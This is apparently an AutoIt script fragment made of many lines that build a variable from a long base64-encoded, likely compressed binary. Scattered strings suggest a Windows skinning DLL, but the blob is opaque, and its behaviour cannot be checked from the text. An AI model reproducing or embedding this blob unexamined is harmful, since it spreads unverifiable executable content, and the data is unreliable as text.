	$bdata &= "FFiIUSQpmhxGB1J0htSRQZcHSEGDgmg+VkGU2CBQmPjeuF4oEq8bxBAA/PWnrD6vQlpZ+Fu68182QSQfJIv/1kEGgTPH1RswVlKu1IPoMIDS0NVoCEeeIsgA7CYSzCoQA9ginVIUBOhLTchFS1EQIAHECggQllT39WWYDkE80CSIl4GPDE3Mq0TBHBI+ktyWMCqB7CFIBCZe7IAdHTBtj0exeA6UcCBAOB+eQ4IKtKzQErBD0ste2FkaBg82vIJCmgMUILI6YMKO1bJUOOTYOOiNxnhD0lW84NyYwpeUHYX/EF0f7+tH+A5IvEhgAlCOE95OAZ1KyPkcQSHdTQRn3F3UAgLByQMhdRBjBE28fnes1QpSOHmh2BFCAQAIJqOGhF/2dCdqCKnuHSTSdBkSBdCJCKMNFnwuSzQ5rEMTfA8yAArrAo91WTs2iHyqLAgclCVpEwziA8cqU3jNExqQjiQjdlmQeDRoGsa7N5+LHAFgSzYKZpnWq"
	$bdata &= "YE7rcEC8OBkBButCBan4BzTaH+rXdi9K0AYhhh5EuqcvWV8dQXMOoBwYBEla19PA25rIpYmBNsDMGbw/jSwEY3mcKIMmY1CEHIJWFRK8NsGVqBXpITpAuF/jbZZA9pfmRVzKXaTAbhOSc3AbrTkvb5f8OyXAeQkJRAEjZvk5saNsMQVuMQrxDJJc1ys5DJJU1vSbLSsTHIgUwzQvPhgJZPMfYKooAX3kdqKpAqJ5JICpWCi/DQb+RSE/uwXfPhaEGxySfTQX6HkRMj8JihcxE4UfyZUv4BawGiFxNpywDKl1bS/2IkILuAfJwxfkIuQizhkkIuQi5C8yImQi+goFMhFyEVAbMhFyEWYxOREyEXwKRzkIuQiSHTkIuQioMxyIuQi+CokJG3LAOQO3+kVeLOnTn8GDgzv2uSSNuCO3Gh/Sbtk2m8E7P7oZtsQcqSsfw7fO9iSA9hP5L5YADlJ4CsEXym5pBno5DBpK6QA7gRkXLe1CQuegc"
	$bdata &= "H6JQ+Qh+o6K4hMONCE/yu0nwBywEZf4MkBpMPo/1wsDICcKkh/LDhCuhKhqhhMmME18KMPRQKFMkFADixkDwzCWBwTvH9Y0nwj6E/Y1EF7Aww/JF8OGGJATnLsZjy/rC1Ql0zIbbhfyKC4yNYhIKjEkuZ7kE+sqHAIGWA/7C4QALlhwN/SA7KRnKKhdi48vwx/i4pbro1snnmcXo+Qgk+0f0yOzC7QwaoKTZ9fH3JioaT8Xy8oIRViEV/ne70tdwhlFRRHw5KrhSrw0S8hk3STkH/w8C0lr6Z7L8R/jTzfxRhFlUiGZDYd+fQqB2xhhIY83VbSVgNNwOgQ+Q41T5e8FQxkguDVOzBEP+ySSSaZ7OzsgGVbw3EVczTl1BkwaEv8CrBhSfhpP2ERhJZvmUjD0hZVXghw7PlTkkcxLF8AqEyA1XEAMVh/bATOJBEVG5LP3kgJLP8o/2PJJW0ErPyMgOBN8p8UGBUbEdGC48Cf/1rBoeUx7B/"
	$bdata &= "o0HIi7zIYn1aFIocyRN+RotDVXXDfVhxjWp8h8VuSBxVrMpT/rKRbDcP/6GGfiHafDwAqvMOTFvKKECMzDCaZ4rh/hfUoLFteDZm/MTN4f8uJYAWxM7RuNUwMn+SvD65GDJLwfzNbyG1AzL/gnzSXnAzU0MjEhoQ8Jl80PMuAXNKO3F7YoOKS5toIT5SQzHPtZIC/EAxvkExTO0mMNQC/je/2RIRXNTT/ASAsT1asqgNgP7904lTxZZM1jD+AfL5vWBg8b1AWbIxDGHDAP1iam2Yi6g7EAqechM4DTKGBRHdA4h5M13X8f41YOnNEs43FlKSYqAU0l5kLS3A6m1BMPix5IDZAP9wmWHtYrw+J1BFMXmvQd3zp/9JSrEc2sD9IXhss2ATcv7hf4iLkADcINAqwSBB/HnNNBpC2XmDwsAywq7+MX+BfMLyqJTe4nwN6l+QQBS5cVTfsIQ+wWl8ZdL4qWB44KJ84VOlTweRKBCk4mHEigoD/"
	$bdata &= "OKzf6EHIgzjYOQQhF1s0318w5IoIF1xf8FjDpCUSCOdaQh4FJzmAagSQHBBMA9QjUbG13xMMWMmrvzn4j6wB+aFPsDof+jVAH5z+YBxPlFcnlqRLOvCTtEsq/sC8vrg7aY4tkBxfjIjrBQMuSH/EzCpGchUfO7+B8qrGfTug3xdtOUA7zL/4VLEKJn9fmByK4DwkfzxQUjnCqr+icGxMwJQDPHy/qC5py5SEzrQ0ismEXDDcfwgOIK/mTD0I/1UIyaE9NMmI49WAfz1gn0o6jXRtvI2oWXB+I9QbTAFWunxNtOUAnN/IUg8KEN9jAuWV3M8Cojw9/D/yoMAi9z44puRFg38+ZMhJMwv7wqFMD2uopByUSHKYH2hY8kB+D2Q/BOVbMPl+pP9vYAWYTMhcOB+BruUEP2RfNDkUxz+Q3z+8QyFvVZ++6EBRyIGQFEBAIUewyGxfmMCgABfEH4AqcuIfQPB/cooivEEcP0FIfuq1hNloZP/ff"
	$bdata &= "DWuZAUa95xBezUtDVI/lD95IJejfkxIQbBDF0ACv4JVjasvQZ9fwU4cKxtCEN8GBIg07K8/lV4gr0JM9Ux5a8sAW/mAX1KcGGBJrF/WLAS1MRyLXjpJpb7k5P4uYNRIJr61FCKKHEMUP1d0PJiPQ0DfQ+QVFZZs30OYGKPpIkO/DgqMpd8Td7jE5LjUgrQ3RF6EnGqfRCxEWHURJKr/F4S0VXFE/wl9XrAObFqEn3/iUHKARQhFNA6SF1FfRWB4YHkgv490RYxkKjmKf7jkKyhwKEYQv9p1XclGXMiJxF7AHkSNS4jfRrQ4kqMIf+CNFGLFcNulNKQ+EDmRRxwezAkcp16NfM+EeUSxzOXgtUdg7FaKaD8fLW15Vb9HjO5MVWNJY59EK8m3aiG9/8CZBSkYjmCJVBXLFXJQ7F8VKapXSBgfDmxCLrMg7yQgr2CanEhM/0h4A7lMJHRwo+QByUikSNAgL+LESPw/SSglR7FXSVS/gFpKNm"
	$bdata &= "r2PX++rApnRUqOwPnlFEHaBBTMpcT5ckm7ZMD5CKD84LxsEka+7PTs9CoE5JVKDP9du8rZ4+z+6AphOGrQaRRfeIeQLjToSjtf6AViAKaQvyLkIqRevOirgRVySxSPkVMhXlg1S2RWQWprv0nfHLCvEJ8CprxlvA6Qp7ZfAc8M6GRzXVifyKjcRiElr0wUn2YoaSNeQNCFAeSSzGzUXDuQGZ/kpG/UioFVKb8v8VwwPE0AnxDDFgMGmO9NCZfP9/lfCLZsFTDCvESYvKoikU2IIRWtCL+/kaNTOD7/wCUPOZDQvE4cazKdSC9OPEI+rP8PIE648lUutl8oTBVEgBrKpXxYITCKIXJO/J9YruFEG084n8hgdV2NP0+/TPKdrX/Z1fwVVHi5LZ2aIJwbwIA8kAPkCAFkgGDILHuIMHkFw/9QBBBDJVbfv1CDRmF1v08Fj8WJUIXOcerEwXHAz1B/EQ9bWl6sb42NeJFHlPhfy5ovUMQnhlE"
	$bdata &= "cnytRCPSAqRK/7OkjjOTVv1E0/kleycvtpO2kUWDah3wI/twCqzwO4NcIVE7sLKvsBkxObjPo8Fdbpi2vUYRr8A+KAwQIn1IAH0ua2SG1jF+0sCZklpIsrwyUfaQiTf+TrFdVginhUtgOZmBRv0NTV0xCSK9TYYjViDA/GhvjlvYE9pwU3Hr6K+TzI1Jr3P7Y/mLy4JgMA1N0enUsCt/FU6Ahc+pon/Av7MOqUg5T1F9Bgx2xR1QAvwgPUhUxYHnfnABjIU9QElx4FZ9UaJ+91TXExZSfuTygehXnVMAf7oyWHECO7oxU7CK3t/xf8FAOwxv9nMTk1XtVIF/JxJRXVXg/7IvkRHLQViicSC6SgNhXMKSgprHiSQ6w1mPDR1iYkCO1TdtH74gMsC8FGEnVWccYgpMrWWX2QFoJ+zQghMFqk5MDxPBFktuj5PBaHO3sLNIQZOxOCBE1dKNgjYVkqYOOCk5awBNbXeQYvsRtNARhlK/igDwk"
	$bdata &= "AVs4B0GzxXI7YKVkRegXW14gR+BbzE8lL/lG6lwgPX9wTCVtRLjkOR7IEUzY1xRdROyYMBh9leh/IDHFBYhFtRZiicbIrReXwTUKHIpYrxHXCo3lXcR9DZVMtUNejEW4qeRRMuRfEJlKppI8aJSQqWQqwOymklOyYBhEZCqZSnCcSqaSqcj0VDKVPGEgTEwlU8l4pNDkUTKV/GIoSqaSqVSAo2QqmazYTCVTyWMEMFw7aaEmLUaICE0RZAL5A151tIQBGZgBDGQDLjl2MTW4dMEnYuRQZKCgpxNyybDBnMywLDk5DR1lJOghJ5AGJKhlUOzNpfYDclkO2JOE+x83XHIs1YCUF+RcuDYk3En0l/ANx0Fm+wvulrEylbTVvUSArGMA+XAMzG6IZuQkR5H7ycBnMKp1gatnxZVkqh3axWgQRTwKppKpaJRhQJ6kpY7AAH48VyMuMMlTadtgDIpEj2NVn0aGAfnzXHWIEWdp2CnsmfaqmnFqF"
	$bdata &= "JMUUEhaCEpw7AEjdh5b1d1yiBEH/HdrVH09YKFoCkESTksIivwCOcmrc2uA9PIRwRQca+iNEH06HhXgbBTdbEAbagCkpUhs1CEXnIh5bTQ55Hw4uTbQRWDcOs4jctKFSv2LjNBN0B/Gs9SpqaStEQjJrvRymgaW9ZCRbmRK2kpe9PJEkJM2Kpq8b0boA0xjkegRXW/TtYkDW9w1dJOP4P8/CHLom2/cMOOAQGvczR8DDshMcAhjAu+c4AByDNnIcGjtCm01d0nf3Fy2L3cUIlIcA/ts5FUVuThJcPyKKdojcVStcb0EesG0v3G8XdMjAkzoz3HwOwZoORFyUHm21JGNf5OANAFgqORAfKiiU1yLuc9y3M0aatKpcxgzc0dsgC2De8w1dCaoppAkfM/YRQ7kCOUQdHonr0bjeODolJxNaEOdfOYJuWcDDOAUoGgqXK3CAM6w6OUQAF7yKvwAagrdQroX070OY9An4DWCqCWgO5D2pI8ErM"
	$bdata &= "RQUckkv20BPy4cVAaQSV5NrITMBBGSSXxTRvecHdQDwD14SxocmL4fgMO/QIg6EXQfIH9moNIt5NuL9GbA7SA/uFythVwcYr6QUNJG8hZBfqjekGDk9mGothogAxMZoiXd5LJC8GCqF7UZBGPIwDzSfer9fKedw7loZC5TWcuQS65d1Rff6cLuIfgGhGhTCAjolApwd7tNy1HzxwUjeT4jkIkSCSAMeb7fcySAaAkQoggUoxyVSqVSKCwwNDjZbVAqPO/PCUiHHPsu/adIz3h8PAnoKRMVSqVS6dlsdICEqVQqlYiMkJSY8vteLqCDDRTA/+f9B1MOOeSg0NTTKpVKpcTM2NzgpFKpVOTo7PCQy2y5+MUR+OtTDnIKKAosExiVdngHitgKfAgkMFKpVCo0ODxAP99bpURI2WoA3ApYFdGD83X2viUUZAAN8PUbzVjMIOBlhizsIr5zLi+THPD8CwAmJLnyXPBIC4QkrXu3QdUNWVMxK8h"
	$bdata &= "GG7wMGjUOMC3OTEy8ooTrIDuHJQiqVXQIFKG1hg2UipkwKlvWGnUaA2TrI/oJjzALDjjr+gwg7v4OYp+sg1/ELc0mWCSZCnSTys0ZZAWuSjsroBZgUqkkRd9uvkyfPDhD/x7nWAA7/EU+A0y7Pr08baOjIJUcz7c2CEcBX0C7GghdkSv/fQgAPoC5BGC5xT5twxHbP+pG8uS4/Lj8v4jJzWNOgR/tAAKejOSb5DMo43ywXrXhY2cIPO5oQ9PEkPLsPgjkwxXFKJju4NczwLRzlJUTg3zSvZCJE7QIClAIjl09QQlxE6BjOpZD+OfDLi9ypIlpcA2u6QVspXsOE6D5AAHztB8QBfiRAAabp7N5Ns9Ms/uCmPaw59k8z8Dg8PcQIJ7neZ5AYICgsMDned950Fb4AAYgQJ7neZ5ibnqGv8uezbN53PlEsfobiOd573nC/PYSBh0obA8jnm149wRJNAbAYnzIttnOsePTNlPlBaJf510w088B"
	$bdata &= "LQYvN99TnlwuCDp4JWRObyA+kP//U2tpbiBGaWxlIExvYWRlZCHgb0BGm/j8D4B2tEOuYmcggTuicgFtftu+Bu74TjHGFirgAAH2YDunHUU8vwY82wAEHC81LPOe7Z0HPMFG0BY9D8kOCbztbd7VBs9H1lcHTpA922bbMzAGRK1GqBYwxKD89mzvLrAWRR5Fe7p+Qf8ABToJZ7PZvgNJDQ5LHEr5L1N57z2b5yzObS5dnlEGjsGCzebLNv4y83bwdKSxV/5/PGBDT01DVEwzMi5ETExVU0VSG+3ZsLVGvFam8pI7QOAe8b89/7cIRD0gaG9tZXN0ZWFkSH5FU1RFQUTNfft/Fm5vcm1hbGNvbA4AQkxVRZ9SdHfb5m4kbGljF1JUQa5JQxdXSU6zY39mAh7RR0RJ5Uv8LO/vvwIfU0hMV0FQSR1TWVOEUt9sP2iAU054VGhluC5kAFVYVEj/iveZRUdD2lfOZG93UHJvY1d1bP9iH0EAR"
	$bdata &= "GVmTdxDaAxk98nQ7kHEJ0FEbGdFbLO/tRd/RnJh8HkfFluLHEH9H6OfGf5AQWRqdXYlUmVjdEXy7jf3w1N5mm1QYY8QcnNJbmZvl7YCW/RFbmFiWlNjcoZCOgBHwxxcZhlBNx9Qgzax5W9zAD9EoHc53cO5+0NvbnQuR4Zx2i4OArtYaXplJw5DebP/7sQnQm90HkN1cnJlbi1O3y34fqoASXMXQYppdpAeQXBtw8a+cCVkf6FDDHNlwUvg+CNEYSI3HbDWbFtwY2tnOHVuZk9wvEUGhx8edmweT2JqTicI7rZXdmxSF39FZGd/xRoOQXVCcrpoJ8UFD9sAZmdpwnIGYXNzJpjgYbAf0EOs4MH22xs4DGR3TW9kdfhIYSqzfbE1CkEng2RkSnNzq1hwL4VMaWIKcnmEVx/BbiAXQTof/HXRv59TQ1JPXEJBUo/xUJnastmfRYFwHpzvaP+ezWvwc3DoDtAlcyAoBjo7m2YFnCkaFwoMhO"
	$bdata &= "hDsEJxY2VwDtAgdI4MqwOYtAzWZEoePB9cGF4BhkM6XGf98Q54Ig1zXE1pXHNvZqYGAWEqIHVS7Rt++yBTdHVkhiA4XFZDXCRsbWZjXI5jPmy7tWwoZRxmeHcWMS4GjzvyPAtm8jBdkPKAFu82smCHIHbzAIYmAt1QHkw2JycngJig0sB2wC7rlcAAum6l+AJ7S9pnAB//AAAfL9vb7p0GR1YnHydnn3ywAHff39/hALQAE3vWAWgAEIy1AH9XjSzAgR7k7pVgAA4UvPMe9CyYm74BFkc2B+8BeFAmdNZXnfD0xFdN3zaeIAaIsFVuaDxrnkW4YVendjYHGUgwTtuAK4NuhjRDH05Af3uezA9e8D8/P+DO9+8/2vs2I3AG9Uam0A6M7q3ViMJuBCVoB1fm/dXjgPwFAHd1bd4jGxlhWD9IftSQPdt3lqmADqowIDlwhD1d8k5leK8fQPXa5AQOITcEaypAWzBscC5TJnDCb1dnsz3bnvY"
	$bdata &= "gYKarwKwAD5FageB/hfjmW4FzV2yuYE9mZpvZx+/oZSAyMDA32nnUN7SGe9eET7C4cPaATga1rllV1/CuwF+YaUVb+gAQgS3wmoReLvXjU1/vHvjPihZFWFRGSUzfJWkgBdb+3X5HUlUnLCElbGQsB/+wahEeTlUCTkRfWFBMT4PbVoJSeCNTVAhUUEGO/3fbfoZBU0tHF1KuQVlOT1RJRlnbhNsOPmpDSzaOQk8ChsvdX1iXRElU/1BBR1MKpvq+vU5/vkVWSUVXF0/8gnfZ97pQl0Opv0JmLEdSRZfAhMpTU0isInb2DjbBSSJvZ6dYz8xlolRmj31miUJVVPrATmgkTr9ET/5p+AFOpazkhuJCb3gAcRUdDShNZHIGczYbjpHDPEhQaUdSbW+/WWJaMEdMWVBIRopUU0lajEdUh93uoRpFlxwGQ0FMJ0RQmM6DykkAANhJTYaFPfdWCENUN32PN7Y7vLcZDUNmRpZVT/AUdg2PU6h4"
	$bdata &= "l1NIQbtDs2x2SdpcQZdVTFNn+51zmTePC7aIRUZG7DZUvIP2RShMSFQJ2va1G5xPVkUfUklH9E9GI8JCs8MueCVP1s4JCtJQPCNGHXPbsy8GSUREJksXQ/72tsveT4JNI0wfTxeyN2nZT0hQF0EyCNrLF0HWRtaNZvjw2283AFb0R05vRRv2Hs8EGx53iUMedHu8j2fThmdUbxQf3T9TCFRDSJ8ncBcvFc1PX6dr+lxr1El8Rw3LSEBaG9kBeUseVkVSVFNP1uKUXTlRFkybFiYqWlTgUHKsVSD0bHSwuUNRDbZSvlMxMyi4tgpPqa9JmlWM486vPFl8ZE6qzaUt1G/LP/lBYLbgQofcCiyKTpiTYh9ifFC3qR3Y1Rf4qaBQbPUKzb8nDtontFNgSN6IQVetdW41QnQRX07aTa3Q3mJvH6UnpawEqb0nna6ftq9cq9kPiRfXYNm96nYXbX41OFOuxaZjzlUZHi6HHhakpAflsJedUx9WT"
	$bdata &= "HQI3Nry4LtiQSeXB0hLzFA7Jxc125wBYB82TVNAEFcUthuLJ596b4ODSKfNSOG9etwwsS8AO1WiWjs6LC8OmR/WjgJzGR/5H2svDZtpM4Ef29pbe4EfgR+BWJpDcAB0wi9nwHnpFKdNQ0HgAgOk7383RZxGInscVvwadRhZwBkWE+HDvbTBWg9XHz9dFxThrT8f5lUWQlROLu6lZVsfOwAHc5s54x4/Ei+vE8A2yN4nH46sTkNBQSKsHzd6RecF7MPHuz9MEkZGry3XVHcfhp7QwdjW2EQxHycYwVugOj8XT7a34q1HF58XWW/FW/EXrxcFF/7K1nAmTRcPRFkzMCEDb3R7aF5grqYoRCAn8YVmkPYpJwFP2o222BaJgQCBgcMQFnmWJD/q3odsF19SIw5j24W9V1NPHEsfvQVrD2sfOR9GRXZXO5pNWbEfivht74BmPJRJRicbxIrt6ReHL6e2j7Y410Y0UA0f2rYx9z0XMVdvV6hSLX"
	$bdata &= "+Fjx8OWDsYux8/a2OZYOqVpScCHLawACkdVl7ZYUtkJKUXXna2r+2t9zcXn3cclxG5V+d2JlxvR9gXJE9JUFW1OMCzKIBTTUYyReZDIuS577xMQRdrK2Y+NXdfrK3YaD81dy/EVlu2PzVvgoWWC+1rLdMTXuEAYk9Hh3dd4UNvF9+Hwaiwty8XLwC4tTGhgkxRGTelERdiJL5FR8HwdYshRm3Xa4G5tSNnHTxYd9bSBANNik8ZrKUp5TfsNxmGVHFUnwBP96xiUCzHZxKDsFUHh0Ab8ra24xU3SU4VtgWrSF/fFbZG1TMtYlCwDAtjDWMf/lQX6gRT4A+GQrtSYnCAtv50TL8seNtKXNnPGRdhYQ14PkGgRDfJ3DZ2YR/IF8mf59721m0fbRdlDr21D2xdb18fVdi7t18XXg9fKJ0LszRbFlMXUuHMr+0PU9hPUDlQoBv3Nw64S6d3p9EeUwAhd09DVXHA9vUAJ90XHbxrcAW/VFV/Grh"
	$bdata &= "VmIYaDycycBeb+4UbEbZYpPfW8FLxH78fcK29BWMXrX9zsG3bth9zv3MXbS20xyFVTnsn99jWtm0nix+TA7YEL8ZGQVVMuW0XQBHmnCFl4a9zroaG9EEcSVoXE8Nxl2kvHkYGHtgWEGrItxz73rghzFbqOUiGa6SlRlQ/H1IKsUNpGwcAU4SxMAducy/vrUNPziEXIR8szENrtwd3T2K/BQonGzUAH+RCLmQ0MzLRVWAuMVUAASt4G4GvH0RLC3f1rW0nIx9IDkwGKwjsbZMnH/1dgSCwAL/vr+FQw4p+UkegUx/F2GZsHw8d18EZ4GJVXxEuueTYKhc0MzJaxZJLMS/FCHNHUzcT/wdSoYuXOVq1Y2siOh8VNReWXHLJNDMyShBCDRI/J05OboUMNQ80MzJHGqFOMX//BMFlDzhLjz5kdT3KYt4JbkS6AHY8WS7vEnJI9kQAQaYMS49q6UpdoLRB02dT80RapCJDJxcnXOxLx69vNR80"
	$bdata &= "hVzIhTMyU9BAhw4NQyhOQzDYAn0nlQDKkGAFb6+K2AZtMC6n1wxuDzhwuthS/x9HDruVhalqEmqvi+2xV9dJRqQdB4e/VwykUpu+V0FZU2gIGUKhVxvPRg9W1Zj3P0fTcADbWYdQT2xpKIcrS2dp2Hi3ygJbV3UqwwDkkv8/S24XNDMy2maPuDHn2HsXSy65ZDQzMuQzUrgxj6hvDzSy7OTkMzIxZ1NyySXHFzQzMqKXalwxXw9GVmAUX0P/T0BiY7sPLysRFg6yz1VLauaU4mk6OAoIRtyiYjFSroxC2g8BFF+ob9MzAJcL8NALFADEbXj3FntH/3VGDyxzCzQWVSeJFwW2jb3nkUmxPalcSlCiLo1***yBzxc+Gz+8BMCa/98VOMK2PWe9L4vuQ0Nob19YTUxOT3bxeqJDfg925dxtTKloQkgn1x/atsSmz/6XSZza2NonUUsAAJZ2jZAvRR/tYdM2ibsXJQFo8KiOVCdT7wZc6S9xT"
	$bdata &= "1NYWFz2AWQZdxdfCwvE2EV/Jx0b78AC1ApJH61XXe6mUw9KTG5QWVK5sdr/VqyXUKAXqlJZvjRZrR7oyK8YUkiXU6wAezi5pJMV5qkp31S1994CmfEZl/SJGxMW4QCzNxBnNAA2f77dJivgb4hMpyVbXixdLCDkJ7AjYAgH9vz/CeXCuQEWkIasYkdg+/wG90gmHJCuB3wn8D4BEGBOkBZjAAE5sGABOPFEqAZ0vxByFd5hdWx0n+C9zWbbX1AGLqA8QBTQfiAT/r6nbkdHJkognwE6YHYpHoEKXEUkXM0+BsBCQSMuQk0AJJgxl0+9lNrbW0tH3VNor1JhSUxLUU9kI3a1Je9XW7WxFEGrV7NoC0ZbV0uf2IitNuuP11gVrK2P1yQvtkZrU0e2+CxjYHlOUbBw32Hz8Tmfb3x2M2Yw5z3dT1+dB2p0Fnnt2Wyefq+l9aYx7QaePJv3nninbr8G/KA5ds/bPu8WoZ7VlmRwBpCwnufZPO"
	$bdata &= "BlEGCQwEi4UfjeAC7YLUJyoWAgvApjYXN0PwmFzfbBn/kEjj07aTABkIeKjwM9wp7tTO8BY3CuVNdqUB5zoKCBfMj2jtvOdCABYRAGyAk5mZhbJmbzdhYHYtEGiI2tzjabzXWDnUBa+Vmcr5elPduzbZgavmQMhp5wW4OzeZ7nBqKywuNcBM/zPM8lRmeIqc6eZ/M87/9dDzBRTp7neX2iutf4SLNg89bZhG3WhQRhPs2C9wArEAYgTlmATVpOgxNcbI8GNlCHmI63bQxvhgevBsUnhlCe90h7BmCWZwFiMCbAcCgc4H+AIzMyNzcw/m4mFG5YqG5luEV4cO4WHMIpFrTJc0Y24QjwFEdkdOEo/AqadGlwc19jAL67gQtXLlBhZ2UAG/hC7J82OI5Db21ib63j5N1qF2hlY2tSimkudduiS7R0kG4nxGhFJHRWwkuw72lld4RUTgzQuT8WjlJuVE1lbW9PBBdszkcPdSJjdGwK2MDuEJp"
	$bdata &= "rZXnmB0lQIezgUcMrw9slsA/6Yo6VMG+MfuredXAcbh72bGmitMTCE49UYWLhV8ydU7AazIatJ9DcWzBwRSdvGGVtEAZmg0dzOHVzEDiFt3FGSETCfuwgJFekX0FUTDqwdqMWU1YX4CBk+I1Md/6EYQLiOGgu70TXoBaewGkkimsnTnHZhk1vbJwslLgh1h+vTV9TsIx6hCGxaF/oA3YFJa60RT+JMCr7UVVFUlk9DH0Uz4IUr4sGLjgdhSUMQnUBiDhQ1JSwNEpWbY/P+fQmgSBugmCdAkA+AZQggUDS3mazBrXwu4CuYB7gDoa0Z/ueHqouxFAWzzCg3rHccL73rQbSLpEw/AYv6GGZpKsUCQAB9zKxblYCLzWCgD8X8sq1Lw0CMTAHI4WcYH9fl4AIL6APIxPyyxOHYBgDDiCAOQ7YowJfEHgvCfYCeYOA8RUCXwGCJ5AKoCgBHyCPXOyG0PNfDhAMAL8LZhjmASAGBwcDApMp2gME"
	$bdata &= "BAW2FH+qwFyomU8vqadVhRYvh+bSLTnJMaibgDeQj732TqDQHsA3eHRvmWBP86olX/qUlZsCQF4lmqDN5oScu7DLcMpQqoYjJ5DQl8Cb8O+cavjeFpZm5pDvzyACORGAmdDwARuQT0Y1CIgBJwhPlYBvhDyAPJbwAZagsA0FWH8kLwQ4Dxg/mnDfwGrLFYAvBAM+oC+VQAKfFCBEgN8WmhieYPg2YB+YEAF/HjEZD5hQT/tM6QJkAR6WELBFgaygL+EUyOaWIJjAmEAT68CnzqahQOfkIH/gn244HKyo0DrwaY/7rIanp6BvPFQkj6fAAeXQ4nsHhKc+pzbkwIoQU6UO5sx1j61gZQSX/zlGNPGQ5NHg0BgzaSqH/Oe6IMLnNr8n7qlALwqFPKC18A9Q4I9GBjughX/FUIMu9uViLzK84KBfNflyIV/JIIQwx2Ch5AN2AnCjL87gpQ9w4AOyYKI/yVCGCfnlYr8Cs7ATAX3AjJEUAK+rs"
	$bdata &= "H3AgZeLLx7DwL/Il4t9wlBGLzO1UEc8QIQToBfvrFAkgPxyER8suCASAdgHXDi2IF+tYCBfJoh+uA8Zc1AAD4seIa/EcPy0Np9RUqBSNtBgtznI3/ixJj3AfOQQVX3aA/0EdtXVwI8dqkBO5IBJbUbjUmYiyl/KUJpTfxlDb3XKL+QxLAYKTw4/kAEjDAMsXwnkA/bV4AIv1jAAlHjAiWB/1uDvY9WBB+LApx5yxy4v7kA4rOdgR3DgQmB/5mNEwYXgLyE3vJDvLu909E5OROZg1BZwgBEUct6wTExo7odE2AAV3yoLC/bABrAUL7eq8IAv5hCfjoKdXMiAABgCL5GwYMCPWCwGvInknyE/6AUo30WIXgNOyer+NNbQNiABIKeqv+pQB41ITukQ3wRyimNHQM/okCac4NTnP+mgz74VA6tH/qB8NlfyOC/tgJjrQCCPKvE28M/wQG1+HAXuPuuQ7JCOU8lvj+tJUB/QE8gJ7BDr8D+tBh"
	$bdata &= "0g3+wwb9wSF/IuYAUZr+5wKOSCPYDvICcvJqIBRAsPBIYaeI51x0oodN/wyY53Qv70JlD+8SBYBSBT9UC+igiPS9CFeUAEHPKwv/SwPmDSAh/zIBh5gDzBL6DlAcAA5AL5APQQBAJ6QKUJgJ/wkFgoHCJfJk14IHfiRPZQcy4AJ/9Qp3APChf1YCZG2vvoacbDwU/GwAcu5FWczfYeQAb7UPqQDgfe2VlGbC//4B58m/a29mdGsB7s8J8myP1w+V6hdAZWCHb9NhIQ6tzItv4wBvdwgQ8+4LDn23o28AACE2CQBz4+gHu2b1gBZgIA+QclhKpd3htgBxWxStgyOjpIR0VlbSNDrAA/U18ETEzVRiFUl8efYMmDPE30gAImwKOqbdMfXB7QBiAwn8lTAMgCJgIfUFWI6hRPoD+fCSrhAQIlb8DuVtUe8G9fQAoEL5ZigDwj4AWMVQfeqm+OAG9yx4qFn9ZQYNQzx0AeNrDfuKEOLFQqjjE"
	$bdata &= "Qf8IDIOQCOmBSECc4FpTv3znQuIETHK85oO+IlUC4FH8vWB8gBwIxAjWgfIB8q+8usAM2AOkAuaVGny44YOqF8AD5KlDgOQBfV0UpVjfPcMghP2oSAMdTSHw8KnpHTwcCFG5wBqC/OAGEnEHQVPCC6EEMn0FAv4A8QXRBAC87wAKBnCB6PADvO0CQBww4O7DPOpAGeBEB4c90JAf5Vch0QvACPGrAewZB4DYAz0KAkDwQgAJCIFE8QB5XeEJAv2vj0Qjfmp2YSBTXUJ+0mws5Xc9NIMxDYHmoEngGgN8CVbBM1igIkeQD5K//WXACR5CuE8gJVKBVYJ8ELpAJRUnrYASgj0ZCHvLHap5aAHRlgKgIm3cDKP7AVoBv4wEQ8mYAW6gYQHGCP2PQr/7AxchwsR5b2JxCkJJBdOijQuzQbvZn4C+QB0DIdDBdiJBX8oNzoBQEZ8DgWrAPc1ACL48YMYGccrBzHyMAMyZzL4c80UY5D15grHc+"
	$bdata &= "BbiSIODOdXZwQB4qBK8CdqAPSh4CAnWAYBQF8oAQN3YQ27zNilYERIQwDoyFECcLBQd01B8B3zMCSM9rQHgB6KX15cs/ePg/UNA/YcoGpVUA4G/StGpaWr9zAnQAefNzd/fuvtMKbgB4AHA6RjJhN0tsIbdWYwBqP5fd+XtTbQ50f2wAaQFoO+99d2YuU2U2ZCZulhLBe19tU2MWbB8XaQOC1yZ1FmEPN/+5SwUHBSd2Yg9AxU7sxMzOBTTkreA/H/QB2az4gkJ0w0NDQ05+z/78qfHSTWJQX0BQQA9geGix9PtHoHtAmpmZPkA/VAAGxeJ4PwJWAEkKVxEO4B34NL4RDELmbnNwYf0xdAXYQpRBbHBoYWOgPZgSHBhHNmSM4xwrABZXBSRhCeC/bqPgbXNpbWczMh81C+gbekxheW91HxeRbAi9Vmz/AqYPTPdC9rzufg8GRCiSkwRweSb44Mdjb24fVEvJGdqyqqAepE+q0DfbOxUG9"
	$bdata &= "O7wDgc8qxAmD3meriZmJgoqB4QeiuQEP7bwUE5HHdkK6P/UlwLDCCDk5NmcH8QA3VBsIMrt7OS4QF8JBD9gAC4oFSf4BoF8+f8JUALZcGKpMdKuoOQGqs2RKWCv8NlQ4hpAAJBAQnTelQVKaWR0aFXhC/eEDVN1bT91T8j1c01ackNzQROrrE5kV+7eBLpLnIRtZSA1IFkPa//lb58gQml0IHArVU5v/9cM0nRpVOxpeGlua01UX01zAria12dX5zdP0AgINt8GCnDAtiYG+qJujkFyDocIbSAWL2Znt32I5RxEAId6WBM3gwkPZARIZyxHAmTHjwpu6nAe89BZ8TEwhgL8wG4D4PPOvqfw8cbyoC/rECbwuCfwvg7rIAZAtv4Sq9/zbwb/XvOADSiE1tAdIw6UjcCg8O9Aom+AJYLgZutv9sCzvZ2O7ECugBb0YOA85eDOfsZe6x7rBMuD++wABnbzwG9/T3t19x4K5B7471b44CVzVv"
